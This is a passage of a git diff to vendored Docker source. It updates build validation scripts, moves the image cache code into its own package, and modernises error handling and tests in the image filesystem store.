@@ -10,7 +10,7 @@ unset IFS
 if [ ${#files[@]} -gt 0 ]; then
 	${SCRIPTDIR}/../generate-swagger-api.sh 2> /dev/null
 	# Let see if the working directory is clean
-	diffs="$(git status --porcelain -- api/types/ 2>/dev/null)"
+	diffs="$(git diff -- api/types/)"
 	if [ "$diffs" ]; then
 		{
 			echo 'The result of hack/generate-swagger-api.sh differs'
diff --git a/vendor/github.com/docker/docker/hack/validate/test-imports b/vendor/github.com/docker/docker/hack/validate/test-imports
index 373caa2f29..0e836a31c0 100755
--- a/vendor/github.com/docker/docker/hack/validate/test-imports
+++ b/vendor/github.com/docker/docker/hack/validate/test-imports
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 # Make sure we're not using gos' Testing package any more in integration-cli
 
 export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
diff --git a/vendor/github.com/docker/docker/hack/validate/toml b/vendor/github.com/docker/docker/hack/validate/toml
index a0cb158dbd..d5b2ce1c29 100755
--- a/vendor/github.com/docker/docker/hack/validate/toml
+++ b/vendor/github.com/docker/docker/hack/validate/toml
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
 source "${SCRIPTDIR}/.validate"
diff --git a/vendor/github.com/docker/docker/hack/validate/vendor b/vendor/github.com/docker/docker/hack/validate/vendor
index 0cb5aabdfa..7d753dfb6d 100755
--- a/vendor/github.com/docker/docker/hack/validate/vendor
+++ b/vendor/github.com/docker/docker/hack/validate/vendor
@@ -1,30 +1,55 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
 source "${SCRIPTDIR}/.validate"
 
-IFS=$'\n'
-files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) ) 
-unset IFS
+validate_vendor_diff(){
+	IFS=$'\n'
+	files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) )
+	unset IFS
 
-if [ ${#files[@]} -gt 0 ]; then
-	# We run vndr to and see if we have a diff afterwards
-	vndr
-	# Let see if the working directory is clean
-	diffs="$(git status --porcelain -- vendor 2>/dev/null)"
-	if [ "$diffs" ]; then
-		{
-			echo 'The result of vndr differs'
-			echo
-			echo "$diffs"
-			echo
-			echo 'Please vendor your package with github.com/LK4D4/vndr.'
-			echo
-		} >&2
-		false
+	if [ ${#files[@]} -gt 0 ]; then
+		# Remove vendor/ first so  that anything not included in vendor.conf will
+		# cause the validation to fail. archive/tar is a special case, see vendor.conf
+		# for details.
+		ls -d vendor/* | grep -v vendor/archive | xargs rm -rf
+		# run vndr to recreate vendor/
+		vndr
+		# check if any files have changed
+		diffs="$(git status --porcelain -- vendor 2>/dev/null)"
+		if [ "$diffs" ]; then
+			{
+				echo 'The result of vndr differs'
+				echo
+				echo "$diffs"
+				echo
+				echo 'Please vendor your package with github.com/LK4D4/vndr.'
+				echo
+			} >&2
+			false
+		else
+			echo 'Congratulations! All vendoring changes are done the right way.'
+		fi
 	else
-		echo 'Congratulations! All vendoring changes are done the right way.'
+		echo 'No vendor changes in diff.'
 	fi
-else
-    echo 'No vendor changes in diff.'
-fi
+}
+
+# 1. make sure all the vendored packages are used
+# 2. make sure all the packages contain license information (just warning, because it can cause false-positive)
+validate_vendor_used() {
+	pkgs=$(mawk '/^[a-zA-Z0-9]/ { print $1 }' < vendor.conf)
+	for f in $pkgs; do
+	if ls -d vendor/$f  > /dev/null 2>&1; then
+		found=$(find vendor/$f -iregex '.*LICENSE.*' -or -iregex '.*COPYRIGHT.*' -or -iregex '.*COPYING.*' | wc -l)
+		if [ $found -eq 0 ]; then
+		echo "WARNING: could not find copyright information for $f"
+		fi
+	else
+		echo "WARNING: $f is vendored but unused"
+	fi
+	done
+}
+
+validate_vendor_diff
+validate_vendor_used
diff --git a/vendor/github.com/docker/docker/hack/validate/vet b/vendor/github.com/docker/docker/hack/validate/vet
deleted file mode 100755
index 64760489ea..0000000000
--- a/vendor/github.com/docker/docker/hack/validate/vet
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/bin/bash
-
-export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-source "${SCRIPTDIR}/.validate"
-
-IFS=$'\n'
-files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' || true) )
-unset IFS
-
-errors=()
-for f in "${files[@]}"; do
-	failedVet=$(go vet "$f")
-	if [ "$failedVet" ]; then
-		errors+=( "$failedVet" )
-	fi
-done
-
-
-if [ ${#errors[@]} -eq 0 ]; then
-	echo 'Congratulations!  All Go source files have been vetted.'
-else
-	{
-		echo "Errors from go vet:"
-		for err in "${errors[@]}"; do
-			echo " - $err"
-		done
-		echo
-		echo 'Please fix the above errors. You can test via "go vet" and commit the result.'
-		echo
-	} >&2
-	false
-fi
diff --git a/vendor/github.com/docker/docker/hack/vendor.sh b/vendor/github.com/docker/docker/hack/vendor.sh
index 9a4d038539..a7a571e7b7 100755
--- a/vendor/github.com/docker/docker/hack/vendor.sh
+++ b/vendor/github.com/docker/docker/hack/vendor.sh
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 # This file is just wrapper around vndr (github.com/LK4D4/vndr) tool.
 # For updating dependencies you should change `vendor.conf` file in root of the
diff --git a/vendor/github.com/docker/docker/daemon/cache.go b/vendor/github.com/docker/docker/image/cache/cache.go
similarity index 72%
rename from vendor/github.com/docker/docker/daemon/cache.go
rename to vendor/github.com/docker/docker/image/cache/cache.go
index a2c2c137f5..6d3f4c57b5 100644
--- a/vendor/github.com/docker/docker/daemon/cache.go
+++ b/vendor/github.com/docker/docker/image/cache/cache.go
@@ -1,4 +1,4 @@
-package daemon
+package cache // import "github.com/docker/docker/image/cache"
 
 import (
 	"encoding/json"
@@ -6,94 +6,101 @@ import (
 	"reflect"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	containertypes "github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/builder"
 	"github.com/docker/docker/dockerversion"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
-	"github.com/docker/docker/runconfig"
 	"github.com/pkg/errors"
 )
 
-// getLocalCachedImage returns the most recent created image that is a child
-// of the image with imgID, that had the same config when it was
-// created. nil is returned if a child cannot be found. An error is
-// returned if the parent image cannot be found.
-func (daemon *Daemon) getLocalCachedImage(imgID image.ID, config *containertypes.Config) (*image.Image, error) {
-	// Loop on the children of the given image and check the config
-	getMatch := func(siblings []image.ID) (*image.Image, error) {
-		var match *image.Image
-		for _, id := range siblings {
-			img, err := daemon.imageStore.Get(id)
-			if err != nil {
-				return nil, fmt.Errorf("unable to find image %q", id)
-			}
-
-			if runconfig.Compare(&img.ContainerConfig, config) {
-				// check for the most up to date match
-				if match == nil || match.Created.Before(img.Created) {
-					match = img
-				}
-			}
-		}
-		return match, nil
+// NewLocal returns a local image cache, based on parent chain
+func NewLocal(store image.Store) *LocalImageCache {
+	return &LocalImageCache{
+		store: store,
 	}
+}
 
-	// In this case, this is `FROM scratch`, which isn't an actual image.
-	if imgID == "" {
-		images := daemon.imageStore.Map()
-		var siblings []image.ID
-		for id, img := range images {
-			if img.Parent == imgID {
-				siblings = append(siblings, id)
-			}
-		}
-		return getMatch(siblings)
-	}
+// LocalImageCache is cache based on parent chain.
+type LocalImageCache struct {
+	store image.Store
+}
 
-	// find match from child images
-	siblings := daemon.imageStore.Children(imgID)
-	return getMatch(siblings)
+// GetCache returns the image id found in the cache
+func (lic *LocalImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) {
+	return getImageIDAndError(getLocalCachedImage(lic.store, image.ID(imgID), config))
 }
 
-// MakeImageCache creates a stateful image cache.
-func (daemon *Daemon) MakeImageCache(sourceRefs []string) builder.ImageCache {
-	if len(sourceRefs) == 0 {
-		return &localImageCache{daemon}
+// New returns an image cache, based on history objects
+func New(store image.Store) *ImageCache {
+	return &ImageCache{
+		store:           store,
+		localImageCache: NewLocal(store),
 	}
+}
 
-	cache := &imageCache{daemon: daemon, localImageCache: &localImageCache{daemon}}
+// ImageCache is cache based on history objects. Requires initial set of images.
+type ImageCache struct {
+	sources         []*image.Image
+	store           image.Store
+	localImageCache *LocalImageCache
+}
+
+// Populate adds an image to the cache (to be queried later)
+func (ic *ImageCache) Populate(image *image.Image) {
+	ic.sources = append(ic.sources, image)
+}
+
+// GetCache returns the image id found in the cache
+func (ic *ImageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) {
+	imgID, err := ic.localImageCache.GetCache(parentID, cfg)
+	if err != nil {
+		return "", err
+	}
+	if imgID != "" {
+		for _, s := range ic.sources {
+			if ic.isParent(s.ID(), image.ID(imgID)) {
+				return imgID, nil
+			}
+		}
+	}
 
-	for _, ref := range sourceRefs {
-		img, err := daemon.GetImage(ref)
+	var parent *image.Image
+	lenHistory := 0
+	if parentID != "" {
+		parent, err = ic.store.Get(image.ID(parentID))
 		if err != nil {
-			logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err)
-			continue
+			return "", errors.Wrapf(err, "unable to find image %v", parentID)
 		}
-		cache.sources = append(cache.sources, img)
+		lenHistory = len(parent.History)
 	}
 
-	return cache
-}
+	for _, target := range ic.sources {
+		if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) {
+			continue
+		}
 
-// localImageCache is cache based on parent chain.
-type localImageCache struct {
-	daemon *Daemon
-}
+		if len(target.History)-1 == lenHistory { // last
+			if parent != nil {
+				if err := ic.store.SetParent(target.ID(), parent.ID()); err != nil {
+					return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID())
+				}
+			}
+			return target.ID().String(), nil
+		}
 
-func (lic *localImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) {
-	return getImageIDAndError(lic.daemon.getLocalCachedImage(image.ID(imgID), config))
-}
+		imgID, err := ic.restoreCachedImage(parent, target, cfg)
+		if err != nil {
+			return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID())
+		}
 
-// imageCache is cache based on history objects. Requires initial set of images.
-type imageCache struct {
-	sources         []*image.Image
-	daemon          *Daemon
-	localImageCache *localImageCache
+		ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm
+		return imgID.String(), nil
+	}
+
+	return "", nil
 }
 
-func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) {
+func (ic *ImageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) {
 	var history []image.History
 	rootFS := image.NewRootFS()
 	lenHistory := 0
@@ -125,21 +132,21 @@ func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *conta
 		return "", errors.Wrap(err, "failed to marshal image config")
 	}
 
-	imgID, err := ic.daemon.imageStore.Create(config)
+	imgID, err := ic.store.Create(config)
 	if err != nil {
 		return "", errors.Wrap(err, "failed to create cache image")
 	}
 
 	if parent != nil {
-		if err := ic.daemon.imageStore.SetParent(imgID, parent.ID()); err != nil {
+		if err := ic.store.SetParent(imgID, parent.ID()); err != nil {
 			return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID())
 		}
 	}
 	return imgID, nil
 }
 
-func (ic *imageCache) isParent(imgID, parentID image.ID) bool {
-	nextParent, err := ic.daemon.imageStore.GetParent(imgID)
+func (ic *ImageCache) isParent(imgID, parentID image.ID) bool {
+	nextParent, err := ic.store.GetParent(imgID)
 	if err != nil {
 		return false
 	}
@@ -149,60 +156,25 @@ func (ic *imageCache) isParent(imgID, parentID image.ID) bool {
 	return ic.isParent(nextParent, parentID)
 }
 
-func (ic *imageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) {
-	imgID, err := ic.localImageCache.GetCache(parentID, cfg)
-	if err != nil {
-		return "", err
-	}
-	if imgID != "" {
-		for _, s := range ic.sources {
-			if ic.isParent(s.ID(), image.ID(imgID)) {
-				return imgID, nil
-			}
-		}
-	}
-
-	var parent *image.Image
-	lenHistory := 0
-	if parentID != "" {
-		parent, err = ic.daemon.imageStore.Get(image.ID(parentID))
-		if err != nil {
-			return "", errors.Wrapf(err, "unable to find image %v", parentID)
-		}
-		lenHistory = len(parent.History)
-	}
-
-	for _, target := range ic.sources {
-		if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) {
-			continue
-		}
-
-		if len(target.History)-1 == lenHistory { // last
-			if parent != nil {
-				if err := ic.daemon.imageStore.SetParent(target.ID(), parent.ID()); err != nil {
-					return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID())
-				}
+func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID {
+	layerIndex := 0
+	for i, h := range image.History {
+		if i == index {
+			if h.EmptyLayer {
+				return ""
 			}
-			return target.ID().String(), nil
+			break
 		}
-
-		imgID, err := ic.restoreCachedImage(parent, target, cfg)
-		if err != nil {
-			return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID())
+		if !h.EmptyLayer {
+			layerIndex++
 		}
-
-		ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm
-		return imgID.String(), nil
 	}
-
-	return "", nil
+	return image.RootFS.DiffIDs[layerIndex] // validate?
 }
 
-func getImageIDAndError(img *image.Image, err error) (string, error) {
-	if img == nil || err != nil {
-		return "", err
-	}
-	return img.ID().String(), nil
+func isValidConfig(cfg *containertypes.Config, h image.History) bool {
+	// todo: make this format better than join that loses data
+	return strings.Join(cfg.Cmd, " ") == h.CreatedBy
 }
 
 func isValidParent(img, parent *image.Image) bool {
@@ -215,7 +187,7 @@ func isValidParent(img, parent *image.Image) bool {
 	if len(parent.History) >= len(img.History) {
 		return false
 	}
-	if len(parent.RootFS.DiffIDs) >= len(img.RootFS.DiffIDs) {
+	if len(parent.RootFS.DiffIDs) > len(img.RootFS.DiffIDs) {
 		return false
 	}
 
@@ -232,23 +204,50 @@ func isValidParent(img, parent *image.Image) bool {
 	return true
 }
 
-func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID {
-	layerIndex := 0
-	for i, h := range image.History {
-		if i == index {
-			if h.EmptyLayer {
-				return ""
+func getImageIDAndError(img *image.Image, err error) (string, error) {
+	if img == nil || err != nil {
+		return "", err
+	}
+	return img.ID().String(), nil
+}
+
+// getLocalCachedImage returns the most recent created image that is a child
+// of the image with imgID, that had the same config when it was
+// created. nil is returned if a child cannot be found. An error is
+// returned if the parent image cannot be found.
+func getLocalCachedImage(imageStore image.Store, imgID image.ID, config *containertypes.Config) (*image.Image, error) {
+	// Loop on the children of the given image and check the config
+	getMatch := func(siblings []image.ID) (*image.Image, error) {
+		var match *image.Image
+		for _, id := range siblings {
+			img, err := imageStore.Get(id)
+			if err != nil {
+				return nil, fmt.Errorf("unable to find image %q", id)
+			}
+
+			if compare(&img.ContainerConfig, config) {
+				// check for the most up to date match
+				if match == nil || match.Created.Before(img.Created) {
+					match = img
+				}
 			}
-			break
 		}
-		if !h.EmptyLayer {
-			layerIndex++
+		return match, nil
+	}
+
+	// In this case, this is `FROM scratch`, which isn't an actual image.
+	if imgID == "" {
+		images := imageStore.Map()
+		var siblings []image.ID
+		for id, img := range images {
+			if img.Parent == imgID {
+				siblings = append(siblings, id)
+			}
 		}
+		return getMatch(siblings)
 	}
-	return image.RootFS.DiffIDs[layerIndex] // validate?
-}
 
-func isValidConfig(cfg *containertypes.Config, h image.History) bool {
-	// todo: make this format better than join that loses data
-	return strings.Join(cfg.Cmd, " ") == h.CreatedBy
+	// find match from child images
+	siblings := imageStore.Children(imgID)
+	return getMatch(siblings)
 }
diff --git a/vendor/github.com/docker/docker/runconfig/compare.go b/vendor/github.com/docker/docker/image/cache/compare.go
similarity index 82%
rename from vendor/github.com/docker/docker/runconfig/compare.go
rename to vendor/github.com/docker/docker/image/cache/compare.go
index 708922f986..e31e9c8bdf 100644
--- a/vendor/github.com/docker/docker/runconfig/compare.go
+++ b/vendor/github.com/docker/docker/image/cache/compare.go
@@ -1,10 +1,12 @@
-package runconfig
+package cache // import "github.com/docker/docker/image/cache"
 
-import "github.com/docker/docker/api/types/container"
+import (
+	"github.com/docker/docker/api/types/container"
+)
 
-// Compare two Config struct. Do not compare the "Image" nor "Hostname" fields
+// compare two Config struct. Do not compare the "Image" nor "Hostname" fields
 // If OpenStdin is set, then it differs
-func Compare(a, b *container.Config) bool {
+func compare(a, b *container.Config) bool {
 	if a == nil || b == nil ||
 		a.OpenStdin || b.OpenStdin {
 		return false
diff --git a/vendor/github.com/docker/docker/runconfig/compare_test.go b/vendor/github.com/docker/docker/image/cache/compare_test.go
similarity index 68%
rename from vendor/github.com/docker/docker/runconfig/compare_test.go
rename to vendor/github.com/docker/docker/image/cache/compare_test.go
index 6370d7a887..939e99f050 100644
--- a/vendor/github.com/docker/docker/runconfig/compare_test.go
+++ b/vendor/github.com/docker/docker/image/cache/compare_test.go
@@ -1,4 +1,4 @@
-package runconfig
+package cache // import "github.com/docker/docker/image/cache"
 
 import (
 	"testing"
@@ -46,9 +46,9 @@ func TestCompare(t *testing.T) {
 
 	sameConfigs := map[*container.Config]*container.Config{
 		// Empty config
-		&container.Config{}: {},
+		{}: {},
 		// Does not compare hostname, domainname & image
-		&container.Config{
+		{
 			Hostname:   "host1",
 			Domainname: "domain1",
 			Image:      "image1",
@@ -60,23 +60,23 @@ func TestCompare(t *testing.T) {
 			User:       "user",
 		},
 		// only OpenStdin
-		&container.Config{OpenStdin: false}: {OpenStdin: false},
+		{OpenStdin: false}: {OpenStdin: false},
 		// only env
-		&container.Config{Env: envs1}: {Env: envs1},
+		{Env: envs1}: {Env: envs1},
 		// only cmd
-		&container.Config{Cmd: cmd1}: {Cmd: cmd1},
+		{Cmd: cmd1}: {Cmd: cmd1},
 		// only labels
-		&container.Config{Labels: labels1}: {Labels: labels1},
+		{Labels: labels1}: {Labels: labels1},
 		// only exposedPorts
-		&container.Config{ExposedPorts: ports1}: {ExposedPorts: ports1},
+		{ExposedPorts: ports1}: {ExposedPorts: ports1},
 		// only entrypoints
-		&container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint1},
+		{Entrypoint: entrypoint1}: {Entrypoint: entrypoint1},
 		// only volumes
-		&container.Config{Volumes: volumes1}: {Volumes: volumes1},
+		{Volumes: volumes1}: {Volumes: volumes1},
 	}
 	differentConfigs := map[*container.Config]*container.Config{
 		nil: nil,
-		&container.Config{
+		{
 			Hostname:   "host1",
 			Domainname: "domain1",
 			Image:      "image1",
@@ -88,38 +88,38 @@ func TestCompare(t *testing.T) {
 			User:       "user2",
 		},
 		// only OpenStdin
-		&container.Config{OpenStdin: false}: {OpenStdin: true},
-		&container.Config{OpenStdin: true}:  {OpenStdin: false},
+		{OpenStdin: false}: {OpenStdin: true},
+		{OpenStdin: true}:  {OpenStdin: false},
 		// only env
-		&container.Config{Env: envs1}: {Env: envs2},
+		{Env: envs1}: {Env: envs2},
 		// only cmd
-		&container.Config{Cmd: cmd1}: {Cmd: cmd2},
+		{Cmd: cmd1}: {Cmd: cmd2},
 		// not the same number of parts
-		&container.Config{Cmd: cmd1}: {Cmd: cmd3},
+		{Cmd: cmd1}: {Cmd: cmd3},
 		// only labels
-		&container.Config{Labels: labels1}: {Labels: labels2},
+		{Labels: labels1}: {Labels: labels2},
 		// not the same number of labels
-		&container.Config{Labels: labels1}: {Labels: labels3},
+		{Labels: labels1}: {Labels: labels3},
 		// only exposedPorts
-		&container.Config{ExposedPorts: ports1}: {ExposedPorts: ports2},
+		{ExposedPorts: ports1}: {ExposedPorts: ports2},
 		// not the same number of ports
-		&container.Config{ExposedPorts: ports1}: {ExposedPorts: ports3},
+		{ExposedPorts: ports1}: {ExposedPorts: ports3},
 		// only entrypoints
-		&container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint2},
+		{Entrypoint: entrypoint1}: {Entrypoint: entrypoint2},
 		// not the same number of parts
-		&container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint3},
+		{Entrypoint: entrypoint1}: {Entrypoint: entrypoint3},
 		// only volumes
-		&container.Config{Volumes: volumes1}: {Volumes: volumes2},
+		{Volumes: volumes1}: {Volumes: volumes2},
 		// not the same number of labels
-		&container.Config{Volumes: volumes1}: {Volumes: volumes3},
+		{Volumes: volumes1}: {Volumes: volumes3},
 	}
 	for config1, config2 := range sameConfigs {
-		if !Compare(config1, config2) {
+		if !compare(config1, config2) {
 			t.Fatalf("Compare should be true for [%v] and [%v]", config1, config2)
 		}
 	}
 	for config1, config2 := range differentConfigs {
-		if Compare(config1, config2) {
+		if compare(config1, config2) {
 			t.Fatalf("Compare should be false for [%v] and [%v]", config1, config2)
 		}
 	}
diff --git a/vendor/github.com/docker/docker/image/fs.go b/vendor/github.com/docker/docker/image/fs.go
index 39cfbf5d74..7080c8c015 100644
--- a/vendor/github.com/docker/docker/image/fs.go
+++ b/vendor/github.com/docker/docker/image/fs.go
@@ -1,4 +1,4 @@
-package image
+package image // import "github.com/docker/docker/image"
 
 import (
 	"fmt"
@@ -7,9 +7,10 @@ import (
 	"path/filepath"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/pkg/ioutils"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // DigestWalkFunc is function called by StoreBackend.Walk
@@ -47,10 +48,10 @@ func newFSStore(root string) (*fs, error) {
 		root: root,
 	}
 	if err := os.MkdirAll(filepath.Join(root, contentDirName, string(digest.Canonical)), 0700); err != nil {
-		return nil, err
+		return nil, errors.Wrap(err, "failed to create storage backend")
 	}
 	if err := os.MkdirAll(filepath.Join(root, metadataDirName, string(digest.Canonical)), 0700); err != nil {
-		return nil, err
+		return nil, errors.Wrap(err, "failed to create storage backend")
 	}
 	return s, nil
 }
@@ -75,7 +76,7 @@ func (s *fs) Walk(f DigestWalkFunc) error {
 	for _, v := range dir {
 		dgst := digest.NewDigestFromHex(string(digest.Canonical), v.Name())
 		if err := dgst.Validate(); err != nil {
-			logrus.Debugf("Skipping invalid digest %s: %s", dgst, err)
+			logrus.Debugf("skipping invalid digest %s: %s", dgst, err)
 			continue
 		}
 		if err := f(dgst); err != nil {
@@ -96,7 +97,7 @@ func (s *fs) Get(dgst digest.Digest) ([]byte, error) {
 func (s *fs) get(dgst digest.Digest) ([]byte, error) {
 	content, err := ioutil.ReadFile(s.contentFile(dgst))
 	if err != nil {
-		return nil, err
+		return nil, errors.Wrapf(err, "failed to get digest %s", dgst)
 	}
 
 	// todo: maybe optional
@@ -113,12 +114,12 @@ func (s *fs) Set(data []byte) (digest.Digest, error) {
 	defer s.Unlock()
 
 	if len(data) == 0 {
-		return "", fmt.Errorf("Invalid empty data")
+		return "", fmt.Errorf("invalid empty data")
 	}
 
 	dgst := digest.FromBytes(data)
 	if err := ioutils.AtomicWriteFile(s.contentFile(dgst), data, 0600); err != nil {
-		return "", err
+		return "", errors.Wrap(err, "failed to write digest data")
 	}
 
 	return dgst, nil
@@ -132,10 +133,7 @@ func (s *fs) Delete(dgst digest.Digest) error {
 	if err := os.RemoveAll(s.metadataDir(dgst)); err != nil {
 		return err
 	}
-	if err := os.Remove(s.contentFile(dgst)); err != nil {
-		return err
-	}
-	return nil
+	return os.Remove(s.contentFile(dgst))
 }
 
 // SetMetadata sets metadata for a given ID. It fails if there's no base file.
@@ -161,7 +159,11 @@ func (s *fs) GetMetadata(dgst digest.Digest, key string) ([]byte, error) {
 	if _, err := s.get(dgst); err != nil {
 		return nil, err
 	}
-	return ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key))
+	bytes, err := ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key))
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to read metadata")
+	}
+	return bytes, nil
 }
 
 // DeleteMetadata removes the metadata associated with a digest.
diff --git a/vendor/github.com/docker/docker/image/fs_test.go b/vendor/github.com/docker/docker/image/fs_test.go
index 8d602d97eb..6290c2b66e 100644
--- a/vendor/github.com/docker/docker/image/fs_test.go
+++ b/vendor/github.com/docker/docker/image/fs_test.go
@@ -1,7 +1,6 @@
-package image
+package image // import "github.com/docker/docker/image"
 
 import (
-	"bytes"
 	"crypto/rand"
 	"crypto/sha256"
 	"encoding/hex"
@@ -11,79 +10,52 @@ import (
 	"path/filepath"
 	"testing"
 
-	"github.com/docker/distribution/digest"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
-func TestFSGetSet(t *testing.T) {
+func defaultFSStoreBackend(t *testing.T) (StoreBackend, func()) {
 	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 
-	testGetSet(t, fs)
+	fsBackend, err := NewFSStoreBackend(tmpdir)
+	assert.Check(t, err)
+
+	return fsBackend, func() { os.RemoveAll(tmpdir) }
 }
 
 func TestFSGetInvalidData(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
 
-	id, err := fs.Set([]byte("foobar"))
-	if err != nil {
-		t.Fatal(err)
-	}
+	id, err := store.Set([]byte("foobar"))
+	assert.Check(t, err)
 
 	dgst := digest.Digest(id)
 
-	if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(filepath.Join(store.(*fs).root, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600)
+	assert.Check(t, err)
 
-	_, err = fs.Get(id)
-	if err == nil {
-		t.Fatal("Expected get to fail after data modification.")
-	}
+	_, err = store.Get(id)
+	assert.Check(t, is.ErrorContains(err, "failed to verify"))
 }
 
 func TestFSInvalidSet(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
 
 	id := digest.FromBytes([]byte("foobar"))
-	err = os.Mkdir(filepath.Join(tmpdir, contentDirName, string(id.Algorithm()), id.Hex()), 0700)
-	if err != nil {
-		t.Fatal(err)
-	}
+	err := os.Mkdir(filepath.Join(store.(*fs).root, contentDirName, string(id.Algorithm()), id.Hex()), 0700)
+	assert.Check(t, err)
 
-	_, err = fs.Set([]byte("foobar"))
-	if err == nil {
-		t.Fatal("Expecting error from invalid filesystem data.")
-	}
+	_, err = store.Set([]byte("foobar"))
+	assert.Check(t, is.ErrorContains(err, "failed to write digest data"))
 }
 
 func TestFSInvalidRoot(t *testing.T) {
 	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 	defer os.RemoveAll(tmpdir)
 
 	tcases := []struct {
@@ -98,34 +70,29 @@ func TestFSInvalidRoot(t *testing.T) {
 		root := filepath.Join(tmpdir, tc.root)
 		filePath := filepath.Join(tmpdir, tc.invalidFile)
 		err := os.MkdirAll(filepath.Dir(filePath), 0700)
-		if err != nil {
-			t.Fatal(err)
-		}
+		assert.Check(t, err)
+
 		f, err := os.Create(filePath)
-		if err != nil {
-			t.Fatal(err)
-		}
+		assert.Check(t, err)
 		f.Close()
 
 		_, err = NewFSStoreBackend(root)
-		if err == nil {
-			t.Fatalf("Expected error from root %q and invlid file %q", tc.root, tc.invalidFile)
-		}
+		assert.Check(t, is.ErrorContains(err, "failed to create storage backend"))
 
 		os.RemoveAll(root)
 	}
 
 }
 
-func testMetadataGetSet(t *testing.T, store StoreBackend) {
+func TestFSMetadataGetSet(t *testing.T) {
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
+
 	id, err := store.Set([]byte("foo"))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
+
 	id2, err := store.Set([]byte("bar"))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 
 	tcases := []struct {
 		id    digest.Digest
@@ -139,115 +106,49 @@ func testMetadataGetSet(t *testing.T, store StoreBackend) {
 
 	for _, tc := range tcases {
 		err = store.SetMetadata(tc.id, tc.key, tc.value)
-		if err != nil {
-			t.Fatal(err)
-		}
+		assert.Check(t, err)
 
 		actual, err := store.GetMetadata(tc.id, tc.key)
-		if err != nil {
-			t.Fatal(err)
-		}
-		if bytes.Compare(actual, tc.value) != 0 {
-			t.Fatalf("Metadata expected %q, got %q", tc.value, actual)
-		}
+		assert.Check(t, err)
+
+		assert.Check(t, is.DeepEqual(tc.value, actual))
 	}
 
 	_, err = store.GetMetadata(id2, "tkey2")
-	if err == nil {
-		t.Fatal("Expected error for getting metadata for unknown key")
-	}
+	assert.Check(t, is.ErrorContains(err, "failed to read metadata"))
 
 	id3 := digest.FromBytes([]byte("baz"))
 	err = store.SetMetadata(id3, "tkey", []byte("tval"))
-	if err == nil {
